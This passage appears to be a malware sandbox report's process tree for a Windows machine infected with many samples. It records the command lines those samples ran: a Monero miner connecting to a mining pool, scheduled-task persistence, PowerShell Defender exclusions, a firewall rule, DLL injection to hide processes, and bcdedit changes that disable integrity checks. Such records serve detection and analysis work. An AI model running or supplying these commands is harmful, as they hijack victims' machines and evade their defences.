"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:876

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4560

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3824

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5048

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5876

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:1968

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5124

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5784

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:3012

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4380

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4456

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:5796

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
6⤵
PID:4932

C:\Users\Admin\Desktop\a\svchost.exe
"C:\Users\Admin\Desktop\a\svchost.exe"
2⤵
PID:2520

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
3⤵
PID:940

C:\Users\Admin\Desktop\a\epitheliogeneticTFr.exe
"C:\Users\Admin\Desktop\a\epitheliogeneticTFr.exe"
2⤵
PID:532

C:\Users\Admin\Desktop\a\pic15.exe
"C:\Users\Admin\Desktop\a\pic15.exe"
2⤵
PID:1896

C:\Users\Admin\Desktop\a\limba.exe
"C:\Users\Admin\Desktop\a\limba.exe"
2⤵
PID:644

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4000

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1620

C:\Users\Admin\Desktop\a\ChatLife.exe
"C:\Users\Admin\Desktop\a\ChatLife.exe"
2⤵
PID:2944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
3⤵
PID:2664

C:\Windows\SysWOW64\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:3328

C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
4⤵
PID:3336

C:\Windows\SysWOW64\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:3864

C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
4⤵
PID:3876

C:\Windows\SysWOW64\cmd.exe
cmd /c md 768318
4⤵
PID:1204

C:\Windows\SysWOW64\findstr.exe
findstr /V "PhoneAbcSchedulesApr" Nbc
4⤵
PID:3188

C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B
4⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
768318\Paraguay.pif 768318\B
4⤵
PID:3580

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit
5⤵
PID:3900

C:\Windows\SysWOW64\timeout.exe
timeout 5
4⤵
- Delays execution with timeout.exe
PID:3664

C:\Users\Admin\Desktop\a\1.exe
"C:\Users\Admin\Desktop\a\1.exe"
2⤵
PID:2896

C:\Users\Admin\Desktop\a\gui.exe
"C:\Users\Admin\Desktop\a\gui.exe"
2⤵
PID:3452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Uhyggestemninger=Get-Content 'C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk';$Unyieldingly=$Uhyggestemninger.SubString(54584,3);.$Unyieldingly($Uhyggestemninger)"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:3264

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
4⤵
PID:3744

C:\Users\Admin\AppData\Local\Temp\telefonselskaberne.exe
"C:\Users\Admin\AppData\Local\Temp\telefonselskaberne.exe"
4⤵
PID:2288

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1308

C:\Users\Admin\Desktop\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
"C:\Users\Admin\Desktop\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
2⤵
PID:1512

C:\Users\Admin\Desktop\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe
"C:\Users\Admin\Desktop\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
3⤵
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2576

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:3312

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
PID:3652

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Scheduled Task/Job: Scheduled Task
PID:2416

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:3352

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3088

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3940

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3444

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3220

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3520

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2868

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3532

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2564

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2508

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3160

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3712

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:576

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2460

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:1840

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3896

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3864

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2020

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:3452

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
PID:3152

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
6⤵
- Modifies boot configuration data using bcdedit
PID:2468

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:2080

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:3900

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
6⤵
- Modifies boot configuration data using bcdedit
PID:2136

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:3628

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:1884

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
6⤵
- Modifies boot configuration data using bcdedit
PID:1532

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
6⤵
- Modifies boot configuration data using bcdedit
PID:992

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
6⤵
- Modifies boot configuration data using bcdedit
PID:1520

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
6⤵
- Modifies boot configuration data using bcdedit
PID:2720

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
6⤵
- Modifies boot configuration data using bcdedit
PID:2312

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
6⤵
- Modifies boot configuration data using bcdedit
PID:3956

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:3412

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
5⤵
- Modifies boot configuration data using bcdedit
PID:2716

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
5⤵
PID:3824

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Scheduled Task/Job: Scheduled Task
PID:3740

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Scheduled Task/Job: Scheduled Task
PID:764

C:\Users\Admin\Desktop\Files\judit.exe
"C:\Users\Admin\Desktop\Files\judit.exe"
2⤵
PID:1352

C:\Users\Admin\AppData\Local\Temp\onefile_1352_133636150123276000\stub.exe
"C:\Users\Admin\Desktop\Files\judit.exe"
3⤵
PID:576

C:\Users\Admin\Desktop\Files\NewR.exe
"C:\Users\Admin\Desktop\Files\NewR.exe"
2⤵
PID:2212

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewR.exe /TR "C:\Users\Admin\Desktop\Files\NewR.exe" /F
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2912

C:\Users\Admin\Desktop\Files\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\Desktop\Files\IerLRtXpEcMnUjz.exe"
2⤵
PID:2480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\IerLRtXpEcMnUjz.exe"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:3716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:4032

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp115F.tmp"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1456

C:\Users\Admin\Desktop\Files\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\Desktop\Files\IerLRtXpEcMnUjz.exe"
3⤵
PID:1492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\IerLRtXpEcMnUjz.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IerLRtXpEcMnUjz.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:1952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:2148

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"
4⤵
- Scheduled Task/Job: Scheduled Task
PID:1356

C:\Users\Admin\Desktop\Files\sarra.exe
"C:\Users\Admin\Desktop\Files\sarra.exe"
2⤵
PID:2140

C:\Users\Admin\Desktop\Files\AdvancedRun.exe
"C:\Users\Admin\Desktop\Files\AdvancedRun.exe"
2⤵
PID:2368

C:\Users\Admin\Desktop\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe
"C:\Users\Admin\Desktop\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe"
2⤵
PID:3148

C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
"C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe"
2⤵
PID:2296

C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe
"C:\Users\Admin\Desktop\Files\igfxCUIService%20Module.exe"
3⤵
PID:3316

C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe
"C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe"
2⤵
PID:1020

C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe
"C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe"
3⤵
PID:3400

C:\Users\Admin\Desktop\Files\tpeinf.exe
"C:\Users\Admin\Desktop\Files\tpeinf.exe"
2⤵
PID:3920

C:\Users\Admin\AppData\Local\Temp\1275827824.exe
C:\Users\Admin\AppData\Local\Temp\1275827824.exe
3⤵
PID:876

C:\Windows\sysmablsvr.exe
C:\Windows\sysmablsvr.exe
4⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\2983122146.exe
C:\Users\Admin\AppData\Local\Temp\2983122146.exe
5⤵
PID:692

C:\Users\Admin\AppData\Local\Temp\55752643.exe
C:\Users\Admin\AppData\Local\Temp\55752643.exe
5⤵
PID:3044

C:\Users\Admin\AppData\Local\Temp\3791710681.exe
C:\Users\Admin\AppData\Local\Temp\3791710681.exe
6⤵
PID:4272

C:\Users\Admin\AppData\Local\Temp\48901205.exe
C:\Users\Admin\AppData\Local\Temp\48901205.exe
5⤵
PID:1752

C:\Users\Admin\AppData\Local\Temp\168366899.exe
C:\Users\Admin\AppData\Local\Temp\168366899.exe
5⤵
PID:5192

C:\Windows\winblrsnrcs.exe
C:\Windows\winblrsnrcs.exe
6⤵
PID:5512

C:\Users\Admin\AppData\Local\Temp\115732779.exe
C:\Users\Admin\AppData\Local\Temp\115732779.exe
5⤵
PID:1532

C:\Users\Admin\Desktop\Files\pinguin.exe
"C:\Users\Admin\Desktop\Files\pinguin.exe"
2⤵
PID:1568

C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
2⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
3⤵
PID:2604

C:\Windows\System32\certutil.exe
C:\Windows\System32\certutil.exe
4⤵
PID:4908

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:4112

C:\Users\Admin\Desktop\Files\file.exe
"C:\Users\Admin\Desktop\Files\file.exe"
2⤵
PID:3224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
3⤵
PID:2776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 1312
3⤵
- Program crash
PID:5424

C:\Users\Admin\Desktop\Files\random.exe
"C:\Users\Admin\Desktop\Files\random.exe"
2⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
3⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
4⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe
"C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"
4⤵
PID:3604

C:\Users\Admin\AppData\Local\Temp\da_protected.exe
"C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
5⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\ybvynq.exe
"C:\Users\Admin\AppData\Local\Temp\ybvynq.exe"
6⤵
PID:5760

C:\Users\Admin\AppData\Local\Temp\setup.exe
setup.exe
7⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
4⤵
PID:2368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 84
5⤵
- Program crash
PID:1408

C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
4⤵
PID:3068

C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
4⤵
PID:3260

C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
4⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 64
5⤵
- Program crash
PID:4708

C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
"C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
4⤵
PID:4220

C:\Users\Admin\AppData\Local\Temp\1000096001\googleads.exe
"C:\Users\Admin\AppData\Local\Temp\1000096001\googleads.exe"
4⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\1000095001\judit.exe
"C:\Users\Admin\AppData\Local\Temp\1000095001\judit.exe"
4⤵
PID:5256

C:\Users\Admin\AppData\Local\Temp\onefile_5256_133636154361130000\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000095001\judit.exe"
5⤵
PID:756

C:\Users\Admin\Desktop\Files\pclient.exe
"C:\Users\Admin\Desktop\Files\pclient.exe"
2⤵
PID:1592

C:\Users\Admin\Desktop\Files\native.exe
"C:\Users\Admin\Desktop\Files\native.exe"
2⤵
PID:1612

C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe
